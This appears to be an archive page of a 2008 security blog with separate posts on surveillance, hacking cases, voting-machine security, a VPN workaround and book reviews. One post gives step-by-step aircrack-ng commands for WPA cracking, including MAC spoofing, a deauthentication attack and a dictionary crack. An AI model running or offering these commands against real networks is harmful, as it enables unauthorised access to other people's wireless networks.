August 2008

It's a good introduction for a non-specialist. It leaves some things out, and I spotted one really minor error, but it's worth your time.

{ Comments on this entry are closed }

This Video demonstrates WPA cracking using dictionary based brute force, all tools used in demonstration are available in Backtrack3.

Backtrack is a security penetration testing live open source Linux distro, Backtrack took two of the best, Whax and Auditor and merged them to make one meaningful distro that emerged as an ethical hackers best choice for security auditing. It comes loaded with tools including network mapping, Info gathering, vulnerability Identification tools, and even some for Bluetooth hacking.

Commands Used in video (Step by Step):

1)airmon-ng stop wlan0

2)ifconfig wlan0 down

3)macchanger –mac 00:11:22:33:44:55 wlan0

4)airmon-ng start wlan0

5)airodump-ng wlan0

6)airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0

7)aireplay-ng -0 5 -a (bssid)wlan0

8)aircrack-ng (filename-01.cap)-w (dictionary location)

Click here to view the embedded video.

Backtrack can be downloaded from here

You may also like this

• WPA crack with Slitaz Aircrack-ng Distribution
• GPU crack WPA 100 times faster then CPU
• BackTrack 4 Artwork Contest
• DirBuster application to brute force hidden directories and files

{ Comments on this entry are closed }

I will be heading to Las Vegas for SANS Network Security 2008. I will be attending Kevin Johnson's Web Application Penetration Testing In-Depth course. Johnson is of Intelguardians fame, the founder of the Basic Analysis and Security Engine project. BASE is a Snort analysis database and front end. Johnson is also the driver of Samurai, the web application penetration testing LiveCD I wish I'd had three months ago so I would not have cluttered my base OS with so many tools.

I'm psyched about going to NS2008. The last time I was in Vegas was for Black Hat 2006.

If I've met you online via Twitter or through the PaulDotCom.com IRC channel and you're going to be in Vegas, let's meet up and grab a beer. And if you're Kevin Johnson or Ed Skoudis, I've already promised you a round.

{ Comments on this entry are closed }

A three-year-old in Dorset, England, is having trouble sleeping at night. She's afraid there's a man outside watching her.

There's a reason. Government employees were following her family to and from school for three weeks, making records such as "female and three children enter target vehicle and drive off" and "curtains open and all lights on in premises".

But, we are told, we have to trade some privacy for security. Let's take a look at the public safety implications, and see if they justify following kids to school and scaring a three-year-old.

The surveillance was to assess whether the family really lived in the coverage area of the school they applied to. (They did, by the way).

The Poole borough spying case.

Ask tough questions if your government tells you they need to invade your privacy in the name of security.

{ Comments on this entry are closed }

Gary McKinnon admits that he went into US government computers without permission.

He was sitting at home in his bathrobe looking around for evidence that the US government had secret alien technology taken from UFOs.

He got into many machines, working alone and without being particularly sophisticated. If you're a US taxpayer, take that as a sign that the computers you're paying for are being badly administered. If a computer is important enough to prosecute someone over, it's important enough to protect well enough that a random eccentric can't get in.

BBC profile of Gary McKinnon
The authorities have warned that without his co-operation and a guilty plea the case could be treated as terrorism and he could face a long jail sentence. "

{ Comments on this entry are closed }

I've written before about the limitations on the "certification" of voting machines.

There's been more talk about it recently. Wired magazine's criticism of voting machine testing notes that problems go years without being fixed, and that the testing consists of going down a checklist that often has nothing to do with reliability or security. Worse, the software running in your election may be different from the software that got certified. University of Iowa computer science professor Douglas Jones proposes testing procedures for voting machines including election-day tests aimed at catching malicious software that gives the right answers until it sees it's in a real election.

Nobody in those discussions mentions a key point. If you could make software reliable by testing it, we'd see a lot fewer bugs in our daily live. Security is even harder to test for than reliability. A program can run just fine and be insecure.

The way to get secure software is to start at the design stage and build it from the ground up to resist or detect attack. For example, the software that adds up the vote totals from the precincts shouldn't allow the machine operator to change the totals without even creating a record of the change. One widely used design did allow that.

The next step in improving software security is to let qualified people, lots of them, look for hidden flaws. That includes cryptographers, but also the kinds of sideways-thinking people who like solving puzzles and doing things that are supposed to be impossible.

{ Comments on this entry are closed }

My company does a lot work with Juniper SSL implemenations.

There has been some odd behavior in Firefox on Windows machines when connecting to Juniper SSL VPN. Immediately after login users are taken to a blank white page. The URL of the page contains data/home/starter0.cgi?check=yes . The page you should be redirected to includes data/home/starter.cgi?check=yes.

Juniper’s suggested work around is to go back to the sign in screen and login again or to remove the 0 from between starter and .cgi. Both are manual solutions, wouldn’t it be easier to have an automatic solution.

Well here it is.

Download the Firefox add on Redirector - https://addons.mozilla.org/en-US/firefox/addon/5064

After installation you will need to restart Firefox

Open Redirector by right clicking on the R in the status bar in Firefox

Click Add…

The Example url is the full url you get stuck on i.e. https://this.ismyexample.com/data/home/starter0.cgi?check=yes

The Include Pattern is https://this.ismyexample.com/data/home/starter0.*

Redirect to is https://this.ismyexample.com/data/home/starter.cgi?check=yes

Set the Pattern Type to Wildcard and click Test pattern

You should get a message that indicates that the pattern matches. If not go back and check your typing.

Click Ok

Click Close

Go back and log in again. You should go right past the page you were getting stuck at previously.

Be safe

James

{ Comments on this entry are closed }

Ok, I admit... the typical reader of Scientific American are probably not the most Internet-savvy folks out there and I actually loved Herbert H. Thompson's article "How I Stole Someone's Identity." Mr. Thompson does a good job explaining how to footprint a person online and begin compromising account after account of theirs simply by using the password reset feature and "security questions" that are used to validate identity.

For many of us, the abundance of personal information we put online combined with the popular model of sending a password reset e-mail has our online security resting unsteadily on the shoulders of one or two e-mail accounts. In Kim's case some of that information came from a blog, but it could just as easily have come from a MySpace page, a sibling's blog (speaking of their birthday, mom's name, etcetera) or from any number of places online.

To someone that has been around information security for a while now, none of this is news. This is actually a little old-school footprint and crack. The problem is: in the old days, the hacker would have to go through great lengths to investigate their marks. As this article shows, those days are gone and now with a simple web search we can find out almost everything about a person. All of our digital shadows are getting longer and keeping track of every account we've signed up for is getting more and more difficult.

It's also critical to remember that once you put data online, it's almost impossible to delete it later. The more you blog about yourself, the more details you put in your social networking profiles, the more information about you is being archived, copied, backed up and analyzed almost immediately. Think first, post later.

Great article and well worth the read.

I'll be posting more about the new risk model in the 2.0 world soon.

{ Comments on this entry are closed }

Chris Eagle’s long-awaited The IDA Pro Book has a very straightforward title, but it is perhaps the most descriptive title possible for this book.  It is simply the IDA Pro book.  The book weighs in at 640 pages and really does an excellent job of covering everything from the basic usage of IDA to using the SDK to extend IDA’s capabilities.  While IDA Pro comes with documentation, it is nowhere near as comprehensive or easy to read.

Chris Eagle is clearly an excellent educator, as he makes the sometimes very dense and technically involved material easy to read and understand and also chooses his examples well.  One of my personal favorites is an extended example on writing an IDA processor module for Python bytecode.  The bytecode’s simple stack language made it easy to focus on the specifics of writing IDA processor modules without getting bogged down in architectural details.  The amount of material spent on how to extend IDA is also unique to this book.

This book does not cover the basics of the x86 architecture and x86 assembly, so it is assumed that the reader is already familiar with it.  The book also does not spend too much time on showing how to identify high-level language constructs (functions, C++ virtual methods, switch tables, loops, etc) in assembly.  After all, this is a book on how to use IDA, not a book on how to read disassembly.  For an extensive treatment on how to read disassembly, check out Kris Kaspersky’s Hacker Disassembling Uncovered or Eldad Eilam’s Reversing: Secrets of Reverse Engineering.

There are several skill levels of IDA Pro users.  The casual (can follow strings or imports references to interesting functions), experienced (can use custom structures to make code easier to read), advanced (can turn assembly into C pseudocode manually), and professional (can write custom IDC scripts and plugins to automate repetitive and/or difficult tasks).  This book makes getting to the higher levels much easier and should really be considered an essential purchase along with an IDA license for any serious user.

{ Comments on this entry are closed }